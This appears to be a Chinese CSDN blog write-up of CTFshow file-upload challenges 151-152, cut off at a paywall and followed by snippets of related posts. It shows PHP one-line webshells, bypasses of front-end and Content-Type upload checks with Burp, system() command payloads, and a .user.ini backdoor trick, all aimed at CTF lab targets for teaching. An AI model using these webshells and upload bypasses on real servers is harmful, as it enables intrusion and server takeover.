CTFshow之文件上传web入门151关-161关解密。包教包会!!!!

已于 2024-06-18 16:27:29 修改
阅读量1.5k 收藏 9
点赞数 40
分类专栏: 网络安全 文章标签: 安全性测试 web安全
于 2024-05-23 22:03:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77578012/article/details/139156115
版权

这段时间一直在搞文件上传相关的知识,正好把ctf的题目写了写,也算是给自字做个总结!

不过ctf有一个缺点就是所有的测试全部是黑盒测试,无法从代码层面和大家解释,我找个时间把upload-labs靶场做一做给大家讲讲白盒的代码审计!

一、实验准备

1.ctf网站:

www.ctf.show

2.工具:

burpsuite抓包工具、hackbar工具(如果大家没有可以私我)、firefox(火狐浏览器)

二、实验过程

(一)第151关 -- 前端验证

前提:我们已知此处可以上传图片类型文件(或者右键查看网站源码可以看见只允许.png文件)

对于前端验证,我们常用的有两种方法进行绕过:

1.在右键检查->设置处启用禁止js

不过此方法不建议使用,因为我们有时候虽然能够绕过,但是当网页含有大量使用js编写的逻辑功能时,会导致网页部分功能瘫痪!

汗颜,ctf也失效了,所以还是老老实实使用第二种方法

2.将后门以.jpg/.png/.gif等允许格式发送,使用bp抓包修改后缀

上传成功!

但是此时可能会有小可爱问呐:哎哎哎,你咋知道就是前端验证呢?说出你的证据!

我们右键查看网页源码,查看到js源码过滤逻辑,只允许我们上传.png文件

3.利用后门文件

一句话木马,上下两种POST括号内参数无论带不带引号均可以:

<?php @eval($_POST['ws'])?>

<?php @eval($_POST[ws])?>

对于上传成功的后门代码,我们有两种方法去利用(本文中我们统一使用第二种方法进行演示):

(1)通过蚁剑连接寻找flag文件

payload:

https://cfc70c23-fd28-45cf-b79f-5c80ebe03e70.challenge.ctf.show/
upload/1.php

连接密码(即post中所填内容):

ws

(2)直接通过hackbar发送post包利用php内置system()函数执行

post data:ws=system("ls ../");

post data:ws=system("tac ../flag.php");

成功!

(二)第152关 -- 不严谨的后端验证

1.上传后门及分析

此处考察我们content-type验证为:image/png、image/gif、image/jpg

传输正确文件抓包,content-type为image/png

发送一句话木马1.php,修改content-type值为:image/png,但是没有包

此处注意一下,我直接上传1.php文件发现无法通过,定睛一看才发现前端验证都没通过,汗颜!上传1.png的木马抓包修改成1.php文件

上传成功!

2.利用后门

与151关类似,我们使用第二种方法,通过hackbar直接发包利用函数的方式获取flag

payload:

https://8ee848c0-130e-4d4c-a316-2c8f5e26d731.challenge.ctf.show/upload/1.php

post data:ws=system('ls ../');

最低0.47元/天 解锁文章
ctfshow文件上传
weixin_53955759的博客
04-15 861
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow-web入门爆破(21-28)
i_kei的博客
12-13 8115
web21 用burp抓包 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了,接下来构造payload 分别选中账户名和密码,我这里选择把冒号放到了账户名那里,放到密码也可以,只是一会儿加前缀和后缀的区别 payload1(账户名):先导入题目提供的字典,然后加后缀冒号,再用base64加密 payload2(密码):导入提供的字典,base64加密 payload1和payload2都需要取消勾选 构造完之后,发现需要爆破的条目数太大了,经过群里大佬
ctfshow-web入门-文件上传web151-web160)
Welcome To Myon'Blog !
07-07 1994
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
ctfshow文件上传web151
m0_62584974的博客
04-05 1184
2022/4/5 先写一个一句话木马文件 <?php eval($_POST[1]); ?> 试着上传php木马文件 上传失败 查看源码发现只能上传png文件 把它改成php 上传我们刚刚写的木马文件 访问我们刚刚上传的文件 利用Hackbar用post的方式提交 1=system("ls /"); 没有发现flag的文件 查看上一层的目录用post的形式提交 1=system("ls ../"); 发现...
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 1843
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow web入门文件上传 web151-web155
m0_62207170的博客
03-14 362
ctfshow web入门文件上传 web151-web155
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相资源的文件。参赛者可能需要分析这个文件,寻找与题目相的线索,比如错误的变量赋值、...
CTFSHOW web入门 web345
最新发布
weixin_44833249的博客
09-29 286
正常来说一个jwt是有三个部分的:标头(Header)、有效载荷(Payload)和签名(Signature)但是这个是最简单的jwt,都没有签名,那么我们可以直接构造了。将拿到的jwt按照.分开,并将上面的一段进行base64解密。这里要注意的是最后要加上".",要不然会得不到flag。由于环境问题,这个加密算法要改成HS256。将user改成admin并base64加密。然后将后面一部分进行base64解密。访问admin路径得到flag。
CTFSHOW web入门 爆破 21-28
Leviathan_Raiden
12-11 2841
CTFSHOW 爆破 [21-28] Web21 可以看到 SELECTED TEXT -> DECODED FROM 用Base64解码 账号密码的格式是 [username]:[password] 所以我们可以用 intruder模块里面的自定义payload position 1: admin position 2: ( : ) 是冒号,不需要用括号哈(方便看清楚) position 3: 可以用题目的字典(其实字典才是最重要) payload processing 使用Base
ctfshow文件上传web151-170wp
weixin_51614272的博客
02-26 2720
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端有
CTFshowweb151~160---文件上传(上)
金 帛的博客
06-02 2936
ctfshow的wp
ctfshow 文件上传
m0_64987233的博客
08-11 137
创建文件.user.ini.png,内容是auto_append_file="1.png"上传该png,抓包,改包(.user.ini.png改成.user.ini),send。放包,上传成功,访问/upload/index.php,POST传参即可RCE。条件:对应目录下面有可执行的php文件,如index.php。auto_prepend_file在木马文件上传前上传。auto_append_file在木马文件上传后上传。上传一句话木马1.png,抓包,send。
CTFShow文件上传
paidx0
08-07 482
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
CTFshow-文件上传
qq_61376069的博客
01-22 621
CTFshow入门——文件上传
CTFSHOW 文件上传
qq_51754713的博客
02-27 432
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFSHOW 文件上传
m0_64180167的博客
11-14 412
直接上传 png的图片马然后抓包修改为php。
CTFSHOW-文件上传
Monica的博客
10-03 3944
环境要求: allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 WEB78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 分析:
Winform入门教程:文件加密与解密实现
在本段中,我们将详细探讨标题“Winform文件加密解密,初学者”中涉及的知识点,这些知识点将帮助初学者理解如何使用Visual Studio 2010和.NET Framework 4.0进行Winform文件加密与解密的基本概念和实现方法。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值